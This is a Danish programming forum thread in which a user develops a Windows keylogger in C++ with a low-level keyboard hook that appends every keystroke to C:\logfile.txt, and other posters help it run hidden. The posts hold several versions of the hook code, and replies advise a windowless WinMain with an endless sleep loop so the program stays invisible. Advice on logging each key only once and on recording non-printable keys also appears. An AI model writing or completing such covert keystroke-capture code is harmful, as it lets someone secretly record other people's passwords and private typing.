Keylogger

Du kan starte med at kikke på:
http://home20.inet.tele.dk/midgaard/snip/rmkey.html

I LowLevelKeyboardProc indeholder HookStruct al den information du behøver.

Tak for linket.
Jeg er nået frem til det her:

#define _WIN32_WINNT 0x0400
#include <windows.h>
#include <iostream>

HHOOK KeyboardHook;

LRESULT LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
   if((nCode == HC_ACTION) && (wParam == WM_KEYDOWN))
   {
        // info om den knap, man har trykket på
        KBDLLHOOKSTRUCT hookstruct = *((KBDLLHOOKSTRUCT*)lParam);

        // bogstavet, der hører til knappen
        char lettre=(char)hookstruct.vkCode;

        // bytes der bliver skrevet til WriteFile()
        DWORD Ecrits;

        // åbner en logfil. laver en ny, hvis den ikke eksisterer
        HANDLE  hFichier = CreateFile("C:\\\\logfile.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL,OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        
        //hvis hfichier er valid
        if( hFichier != INVALID_HANDLE_VALUE)
        {
         // sætter pointeren i slutningen af filen
         SetFilePointer(hFichier,NULL,NULL,FILE_END);

         // skriver knappen til logfilen
         WriteFile(hFichier,&lettre,1,&Ecrits,NULL);

         // lukker logfilen
         CloseHandle(hFichier);
        }
   }

   return CallNextHookEx(KeyboardHook, nCode, wParam, lParam);
}

int main()
{
char ch;
 while ( (ch = std::cin.get()) != 'x')
 {
       KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC  )LowLevelKeyboardProc, GetModuleHandle(0), 0);
 }
return EXIT_SUCCESS;
}

Men jeg får følgende compilerfejl:

keyloggeren.cpp: In function `LRESULT LowLevelKeyboardProc(int, WPARAM, LPARAM)':
keyloggeren.cpp:27: warning: passing NULL used for non-pointer converting 2 of `DWORD SetFilePointer(void*, LONG, LONG*, DWORD)'

Linje 27 er:

SetFilePointer(hFichier,NULL,NULL,FILE_END);

Håber nogen lige vil tage et kig på det og fortælle, hvad der er galt.

Det er "kun" en warning.

Du kan rette denne og den anden fejl med:

        HANDLE  hFichier = CreateFile("C:\\\\logfile.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL,OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

        //hvis hfichier er valid
        if( hFichier != INVALID_HANDLE_VALUE)
        {
         // sætter pointeren i slutningen af filen
         SetFilePointer(hFichier,0,NULL,FILE_END);

Men er det ikke lettere at bruge en std::ofstream?

Ok, tak. Jeg tog dit forslag til mig med ofstream og koden compiler også fint nu.
Jeg har dog stadig problemer, for den gør ikke det, jeg vil have den til. Koden ser nu således ud:

#define _WIN32_WINNT 0x0400
#include <windows.h>
#include <iostream>
#include <fstream>

HHOOK KeyboardHook;

LRESULT LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
   if((nCode == HC_ACTION) && (wParam == WM_KEYDOWN))
   {
        // info om den knap, man har trykket på
        KBDLLHOOKSTRUCT hookstruct = *((KBDLLHOOKSTRUCT*)lParam);

        // bogstavet, der hører til knappen
        char letter=(char)hookstruct.vkCode;

        std::ofstream outfile;
        outfile.open ("C:\\\\logfile.txt", std::ofstream::out | std::ofstream::app);
        outfile << &letter;
        outfile.close();
   }
   return CallNextHookEx(KeyboardHook, nCode, wParam, lParam);
}

int main()
{
KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC  )LowLevelKeyboardProc, GetModuleHandle(0), 0);
return EXIT_SUCCESS;
}

Programmet lukker bare med det samme igen, hvilket jo er klart set udfra koden. Meningen er jo, at det skal køre "usynligt" i baggrunden og logge alle knapper, jeg trykker på. Pt. er det synligt, lukker med det samme og skriver derfor heller ikke noget til filen.

Nogen, som kan hjælpe en smule med dette?

Du kan lave det som et windows program (så undgår du konsol vinduet) og lave en uendelig loop i enden af main (i.e. WinMain), noget i stil med:

int WINAPI WinMain(HINSTANCE hInstance,
                   HINSTANCE,
                   LPSTR lpCmdLine,
                   INT nCmdShow)
{
KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC  )LowLevelKeyboardProc, GetModuleHandle(0), 0);
   while(1)
      Sleep(10000000);
return EXIT_SUCCESS;
}

ok, jeg har nu lavet det til et windows program, hvilket gør som jeg gerne vil, bortset fra ikke at skrive et tryk til logfilen. Den timer derimod nærmest ud, når jeg trykker på en knap, og jeg bliver nødt til at vente et par minutter før computeren er til at bruge igen.

nogen idéer?

Så, nu er jeg endeligt kommet tættere på en løsning.
Ud fra din kode, Bertel, på din hjemmeside, er jeg kommet frem til:

/* The original version of this program can be found at http://home20.inet.tele.dk/midgaard */ 
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <stdlib.h>
#include <iostream>
#include <fstream>

HHOOK KeyboardHook;

LRESULT LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
   if(nCode == HC_ACTION)
   {
      KBDLLHOOKSTRUCT *HookStruct = (KBDLLHOOKSTRUCT *)lParam;
      std::ofstream outfile;
      outfile.open ("C:\\\\logfile.txt", std::ofstream::out | std::ofstream::app);
      outfile << (char)HookStruct->vkCode;
      outfile.close();
      return true;
   }
  
   return CallNextHookEx(KeyboardHook, nCode, wParam, lParam);
}

int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE,LPSTR lpCmdLine,INT nCmdShow)
{
   KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC  )LowLevelKeyboardProc, GetModuleHandle(0), 0);
   if(!KeyboardHook) MessageBox(0, "Hook fejlede", "Keylogger", MB_OK);
   MessageBox(0, "Hook kører", "Keylogger", MB_OK);
   return EXIT_SUCCESS;
}

Der er dog stadig ting, som jeg gerne vil have ændret, men ikke ved hvordan. Som sagt skal man ikke kunne se, at programmet kører. Grunden til at programmet bliver set nu, er jo message boksen. Jeg leder altså efter et alternativ til at "pause" programmet før det når at slutte.

Derudover gentager den hver knap jeg trykker på i filen. F.eks. anders bliver til AANNDDEERRSS. Hvorfor og er der en løsning?

Til sidst vil jeg gerne have den til også at logge andre knapper end tal og bogstaver. F.eks. bliver Enter og Backspace logget med firkanter. Hvorfor og er der en løsning? Pt. "oversætter" jeg jo tallene ved bare at skrive "(char)".

Håber der er nogen, der vil hjælpe : )

Du skal ikke have "return true" i LowLevelKeyboardProc, medmindre at du vil have den til at smide taste trykket væk.

wParam i LowLevelKeyboardProc fortæller hvilken tast det er. Den kan være: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, eller WM_SYSKEYUP. Hvis du kun vil registrere tasterne én gang kan du nøjes med at skrive i filen når wParam er WM_KEYDOWN eller WM_SYSKEYDOWN.

Det bør virke med

while(1)
Sleep(10000000);

I stedet for MessageBox(...)

Du kan bruge isprint fra ctype.h til at finde ud af om tasten er et normalt tegn. Hvis ikke det er det kan du skrive int værdien for tasten i filen.

Ok, mange tak. Jeg kan dog stadig ikke få det med while og sleep til at virke. Den går helt i stå ligeså snart, jeg har programmet åbent og trykker på en knap. Ved du hvorfor?

Samtidig forstår forstår isprint funktionen ikke nok til at "oversætte" alle knapper.. Skal jeg virkeligt til at skrive oversættelser til hver knap?

Prøv at poste hele din kode, så er det muligt at jeg kan se hvad der sker.

Om du skal skrive en "oversætter til hver knap kommer nok an på hvad du vil have.

Prøv at fortælle hvad du vil have af output, så finder vi nok en løsning.